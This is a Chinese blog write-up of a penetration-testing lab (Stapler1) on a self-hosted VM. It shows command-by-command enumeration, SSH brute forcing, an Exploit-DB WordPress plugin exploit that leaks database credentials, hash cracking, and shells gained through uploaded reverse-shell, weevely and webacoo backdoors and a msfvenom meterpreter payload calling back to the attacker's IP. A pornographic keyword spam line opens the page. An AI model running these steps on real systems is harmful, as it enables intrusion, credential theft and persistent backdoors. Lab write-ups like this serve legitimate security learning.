亚洲熟妇av一区二区三区,久久久久久精品观看sss,免费观看四虎精品国产永久,国产成人精品一区二三区熟女,天堂网在线最新版www资源网

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

聲明:本文僅用于技術(shù)討論與研究,對于所有筆記中復(fù)現(xiàn)的這些終端或者服務(wù)器,都是自行搭建的環(huán)境進(jìn)行滲透的。我將使用kali Linux作為此次學(xué)習(xí)的攻擊者機(jī)器。這里使用的技術(shù)僅用于學(xué)習(xí)教育目的,如果列出的技術(shù)用于其他任何目標(biāo),本站及作者概不負(fù)責(zé)。

一、信息收集

信息收集非常重要,有了信息才能知道下一步該如何進(jìn)行,接下來將用nmap來演示信息收集:

1、nmap掃描存活I(lǐng)P

由于本項(xiàng)目環(huán)境是nat模式需要項(xiàng)目IP地址,掃描挖掘本地的IP地址信息:

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

發(fā)現(xiàn)本kali ip為40段!用40段進(jìn)行全網(wǎng)段掃描:

nmap -sP 192.168.40.0/24

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

發(fā)現(xiàn)項(xiàng)目IP為152!

2、nmap全端口服務(wù)枚舉

進(jìn)行namp全端口服務(wù)枚舉:

nmap -sS -sV -A -T5 -p- 192.168.40.152

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

得到開放的端口信息:

21/tcp open ftp vsftpd 2.0.8 or later FTP-anon: Anonymous FTP login allowed (FTP code 230)22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)53/tcp open domain dnsmasq 2.7580/tcp open http PHP cli server 5.5 or later123/tcp closed ntp139/tcp open NetBIOS-ssn samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)666/tcp open doom? message2.jpgUT 3306/tcp open mysql MySQL 5.7.12-0ubuntu112380/tcp open http Apache httpd 2.4.18 ((Ubuntu))

以及smb2(windows445端口,共享用)利用!
可以看到有很多容易受到攻擊的端口都開著,F(xiàn)TP、NetBIOS、MySQL和運(yùn)行Web服務(wù)器(Apache HTTPD)的端口12380等等!

二、各類服務(wù)端口信息枚舉

【→所有資源關(guān)注我,私信回復(fù)“資料”獲取←】
1、網(wǎng)絡(luò)安全學(xué)習(xí)路線
2、電子書籍(白帽子)
3、安全大廠內(nèi)部視頻
4、100份src文檔
5、常見安全面試題
6、ctf大賽經(jīng)典題目解析
7、全套工具包
8、應(yīng)急響應(yīng)筆記

1、FTP信息枚舉

根據(jù)nmap全端口服務(wù)枚舉的提示,ftp允許匿名登錄:

21/tcp open ftp vsftpd 2.0.8 or later ftp-anon: Anonymous FTP login allowed (FTP code 230)

1)ftp匿名登錄枚舉

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

ftp 192.168.40.152get note ---下載note文件

未授權(quán)登錄成功,查到note文件,并下載查看!

2)查看note文件

通過ftp下載該文件進(jìn)行查看:

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.

里面是txt文本信息:說將賬號信息留存在FTP中,那么還有別的賬號密碼!
獲得兩個(gè)用戶名:Elly、John,其他無可用信息!

2、Samba信息收集

這是139的Samba服務(wù),可以用smbclient來查看。

smbclient是一個(gè)開放的netbios-ssn,用smbclient來查看(屬于samba套件,它提供一種命令行使用交互式方式訪問samba服務(wù)器的共享資源)!用Enum4linux枚舉,這是一個(gè)用于枚舉來自Windows和Samba系統(tǒng)的信息的工具。

1)Enum4linux枚舉

enum4linux -a 192.168.40.152-a 做所有參數(shù)選項(xiàng)枚舉一遍

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

獲取到2個(gè)可用信息:
1. ok活躍信息:

//192.168.40.152/kathy Mapping: OK, Listing: OK//192.168.40.152/tmp Mapping: OK, Listing: OK

kathy和tmp兩個(gè)信息非常活躍!可以用smbclient連接!

2. 發(fā)現(xiàn)了20個(gè)用戶信息

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

kathy和tmp兩個(gè)信息非常活躍!可以用smbclient連接!

2)保存用戶信息,并篩查

gedit user.txtcat user.txt | cut -d '' -f2 | cut -d ' ' -f1 > user.txt

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

將通過篩選剔除后,獲得正常的用戶名:user.txt!

3、暴力破解ssh信息枚舉

1)hydra暴力破解

nmap掃描ssh端口為開放狀態(tài),利用hydra爆破

hydra -L user.txt -P user.txt 192.168.40.152 ssh

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

login: SHayslett password: SHayslett

獲得ssh登錄賬號密碼!

2)ssh登錄

ssh嘗試登錄:

ssh SHayslett@192.168.40.152

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

登錄成功!到了這一步有非常多的提權(quán)方法,咱們繼續(xù)分析該項(xiàng)目環(huán)境!

4、nc信息枚舉666端口

1)訪問http端口

通過瀏覽器訪問該端口:

http://192.168.40.152:666/

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

發(fā)現(xiàn)這是一個(gè)文件!

2)nc下載文件

通過nc訪問該端口進(jìn)行探測:

nc 192.168.40.152 666 >test #將文件下載為test file test #查看test版本unzip -h #看下zip版本信息unzip test #用zip解壓test文件

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

通過nc下載壓縮文件,并解壓獲得message2的jpg圖片!

3)Strings查看圖片信息

strings查看該圖片隱藏信息:

strings message2.jpg

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

給了兩個(gè)cookie值,先留著該信息!

5、枚舉12380端口信息收集

1)訪問端口

用瀏覽器訪問該頁面:

http://192.168.40.152:12380/

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

發(fā)現(xiàn)該頁面沒有可利用的信息,進(jìn)行漏掃看看!

2)Nikto掃描URL

nikto 是一款開放源代碼的、功能強(qiáng)大的 WEB 掃描評估軟件,能對 web 服務(wù)器多種安全項(xiàng)目進(jìn)行測試的掃描軟件,去尋找已知有名的漏洞,能在230多種服務(wù)器上掃描出2600多種有潛在危險(xiǎn)的文件、CGI 及其他問題,它可以掃描指定主機(jī)的 WEB 類型、主機(jī)名、特定目錄、Cookie、特定 CGI 漏洞、返回主機(jī)允許的 http 模式等等。

nikto -h http://192.168.40.152:12380/

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

發(fā)現(xiàn)三個(gè)目錄/admin112233/、/blogblog/、/phpmyadmin/,發(fā)現(xiàn)提示ssl Info,說明是ssl訪問的,可以HTTPS訪問,嘗試訪問http訪問會(huì)重定向回來,需要HTTPS訪問URL!

3)ssl訪問

先枚舉訪問/admin112233目錄:

https://192.168.40.152:12380/admin112233/

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

回顯:This could of been a BeEF-XSS hook ??,存在XSS!

枚舉訪問/blogblog目錄:

https://192.168.40.152:12380/blogblog/

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

發(fā)現(xiàn)該網(wǎng)站的是用wordpress搭建的,版本是4.2.1

枚舉訪問/phpmyadmin目錄:

https://192.168.40.152:12380/phpmyadmin

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

得到phpmyadmin的后臺(tái)登錄界面,需要賬戶密碼!

6、Wpscan信息收集

從blogblog目錄可以發(fā)現(xiàn)該站存在wordpress站!可利用wpscan進(jìn)行枚舉掃描!

1)wpscan掃描blogblog網(wǎng)頁

wpscan --url https://192.168.40.152:12380/blogblog/ --disable-tls-checks--disable-tls-checks ---因?yàn)闀?huì)受到SSL對等證書/SSH錯(cuò)誤臨時(shí)用法!

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

提示我們登錄https://wpscan.com/register獲取wpscan API令牌,才能輸出漏洞數(shù)據(jù)

2)獲取wpscan API令牌

需要訪問官網(wǎng),獲取密匙

https://wpscan.com/register

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

在官網(wǎng)登錄后主頁面存在API token復(fù)制即可!

3)wpscan掃描

通過獲取的token直接開始掃描:

wpscan --url https://192.168.40.152:12380/blogblog/ -e u --api-token kJ4bhZCgveCcoGJPER7AOsHJTeFDf90Wfj9zu0V6asc --disable-tls-checks

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

掃描發(fā)現(xiàn)該目錄:blogblog/wp-content/,訪問下收集信息!還存在很多漏洞CVE信息,如感興趣可深入研究!

4)訪問發(fā)現(xiàn)有3個(gè)子目錄

在blogblog/wp-content/plugins/發(fā)現(xiàn):

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

發(fā)現(xiàn)存在advanced_video_embed.php,提示存在wordpress advanced video插件模塊信息!

三、wordpress advanced漏洞利用

1、39646 exp利用

谷歌搜索:

wordpress advanced video exploit

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

可以利用39646,在kali上查找并利用!

2、查找并利用py腳本

kali滲透系統(tǒng)自帶很多exp腳本,直接查找即可!

cp /usr/share/exploitdb/exploits/php/webapps/39646.py .

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

將exp復(fù)制到利用目錄!

3、修改exp代碼

添加修改以下內(nèi)容:

import sslssl._create_default_https_context = ssl._create_unverified_contexturl = "https://192.168.40.152:12380/blogblog/"

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

4、訪問URL文件上傳頁面:

通過修改exp代碼,進(jìn)行對項(xiàng)目環(huán)境滲透行為后,在upload目錄會(huì)出現(xiàn)新的文件內(nèi)容:

https://192.168.40.152:12380/blogblog/wp-content/uploads

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

目錄下會(huì)出現(xiàn)圖片:193104749.jpeg,下載:

wget --no-check-certificate https://192.168.40.152:12380/blogblog/wp-content/uploads/193104749.jpeg--no-check-certificate ---這個(gè)參數(shù)可促使wget下載ssl文件

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

下載后進(jìn)行分析圖片信息!

5、圖片信息枚舉

file查看圖片類型:

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

193104749.jpeg: PHP script, ASCII text

這是一個(gè)php代碼的txt文本!直接查看!

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

define('DB_USER', 'root');define('DB_PASSWORD', 'plbkac');

獲得mysql用戶名密碼:

root/plbkac

接下來使用賬號密碼直接枚舉數(shù)據(jù)庫!

四、Mysql信息枚舉 暴力破解

1、庫表信息枚舉

利用圖片枚舉出的mysql數(shù)據(jù)庫賬號密碼進(jìn)行枚舉:

mysql -uroot -pplbkac -h 192.168.40.152 #利用獲得的賬戶密碼遠(yuǎn)程登錄show databases; #查看數(shù)據(jù)庫信息use wordpress #進(jìn)入wordpressshow tables; #查看表信息

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

通過mysql命令枚舉到數(shù)據(jù)庫wordpress庫中存在wp_users表信息!

2、表字段信息枚舉

讀取wp_user用戶表數(shù)據(jù):

desc wp_users;select user_login,user_pass from wp_users;或者select * from wp_users;

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

通過select枚舉出該表所有信息內(nèi)容存在用戶名和MD5加密的密碼信息!將數(shù)據(jù)保存至本地:

gedit 1.txt

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

3、awk分解保存

使用awk進(jìn)行文本出來提取user_pass這個(gè)字段所有值,在保存至pass.txt
awk拆分密碼信息:
密碼在第3部分

awk -F'|' '{print $3}' 1.txt > pass.txt

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

4、john爆破密碼本

繼續(xù)使用John的rockyou文本對mysql密碼信息進(jìn)行爆破:

john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

$P$B7889EMq/erHIuZapMB8GEizebcIy9.:incorrect

發(fā)現(xiàn)對應(yīng)john用戶,密碼為incorrect

五、Getshell

通過暴力破解數(shù)據(jù)庫中的密碼值,發(fā)現(xiàn)了賬號密碼信息可直接登錄wordpress后臺(tái),登錄后有很多方法可以getshell,接下來就簡單介紹利用!

1、登錄后臺(tái)

訪問后臺(tái)頁面,用賬戶:john,密碼:incorrect

https://192.168.40.152:12380/blogblog/wp-login.php

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

測試可成功登錄!

2、文件上傳

Plugins-》 add New -》upload Plugin :存在上傳文件

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

3、php-webshell利用

復(fù)制phpshell到本文件夾:

cp /usr/share/webshells/php/php-reverse-shell.php .

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

配置PHP文件,將IP更改為本地kail IP:

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

修改完成即可上傳文件!上傳PHP文件:

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

查看是否上傳成功:

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

上傳成功!本地開啟nc服務(wù),并訪問后門進(jìn)行反彈shell:

nc -vlp 1234https://192.168.40.152:12380/blogblog/wp-content/uploads/php-reverse-shell.php

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

成功獲得反彈shell,并控制項(xiàng)目環(huán)境服務(wù)器!

4、weevely利用

1)利用weevely生成PHP木馬文件

Weevely是一個(gè)隱形的PHP網(wǎng)頁的外殼,模擬的遠(yuǎn)程連接。

軟件特點(diǎn):

生成和管理很難檢測到的PHP木馬,這是一個(gè)Web應(yīng)用程序后開發(fā)的重要工具,可用于像一個(gè)隱藏的后門,作為一個(gè)有用的遠(yuǎn)程控制臺(tái)更換管理網(wǎng)絡(luò)帳戶,即使托管在免費(fèi)托管服務(wù)。只是生成并上傳“服務(wù)器”目標(biāo)Web服務(wù)器上的PHP代碼,Weevely客戶端在本地運(yùn)行shell命令傳輸。

weevely generate pass11 test.php ---生成test.php文件密碼為passtestgenerate ---生成新代理

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

weevely的優(yōu)勢在于免殺性,可看到php木馬信息是混淆過的特征!

2)上傳文件

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

驗(yàn)證上傳是否成功:

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

成功上傳!

3)運(yùn)行該P(yáng)HP文件,獲得shell

weevely https://192.168.40.152:12380/blogblog/wp-content/uploads/test.php passtest

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

成功獲得shell,該shell很穩(wěn)定!

5、webacoo利用

WeBaCoo(Web Backdoor Cookie)是一款隱蔽的腳本類Web后門工具。 借助HTTP協(xié)議,它可在客戶端和Web服務(wù)器之間實(shí)現(xiàn)執(zhí)行代碼的網(wǎng)頁終端。 WeBaCoo的精妙之處在于,Web服務(wù)器和客戶端之間的通信載體是Cookie。

1)webacoo生成PHP后門文件

webacoo -g -o webacoo.php-g 生成后門代碼(需要-o)-o OUTPUT 生成的后門輸出文件名

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

可看到webacoo也是通過特征混淆了php木馬,但是沒用weevely免殺性能好!

2)后臺(tái)頁面上傳該P(yáng)HP后門

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

訪問是否上傳成功:

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

成功上傳!

3)遠(yuǎn)程連接執(zhí)行PHP文件

webacoo -t -u https://192.168.40.152:12380/blogblog/wp-content/uploads/webacoo.php-t 建立遠(yuǎn)程“終端”連接(需要-u)-u URL 后門 URL

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

成功獲得shell,該shell很穩(wěn)定!

6、MSFconsole上線webshell

Metasploit項(xiàng)目是一個(gè)旨在提供安全漏洞信息計(jì)算機(jī)安全項(xiàng)目,可以協(xié)助安全工程師進(jìn)行滲透測試(penetration testing)及入侵檢測系統(tǒng)簽名開發(fā)。

1)kali本地生成webshell

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.40.149 LPORT=4455 -f raw > msf.php--LHOST 為kali本地IP--LPORT 為連接端口

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

生成成功msf.php木馬文件!

2)后臺(tái)上傳PHP文件

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

上傳成功:

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

成功上傳后需要msf開啟監(jiān)聽!

3)msf開啟監(jiān)聽

開啟msfconsole進(jìn)入MSF框架:

msfconsoleuse exploit/multi/handlerset payload php/meterpreter_reverse_tcpset LHOST 192.168.40.149set LPORT 4455run

「網(wǎng)絡(luò)安全」紅隊(duì)滲透項(xiàng)目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊(duì)是什么意思)

開啟監(jiān)聽后,訪問msf.php文件觸發(fā),可看到反彈shell成功!

版權(quán)聲明:本文內(nèi)容由互聯(lián)網(wǎng)用戶自發(fā)貢獻(xiàn),該文觀點(diǎn)僅代表作者本人。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如發(fā)現(xiàn)本站有涉嫌抄襲侵權(quán)/違法違規(guī)的內(nèi)容, 請發(fā)送郵件至 舉報(bào),一經(jīng)查實(shí),本站將立刻刪除。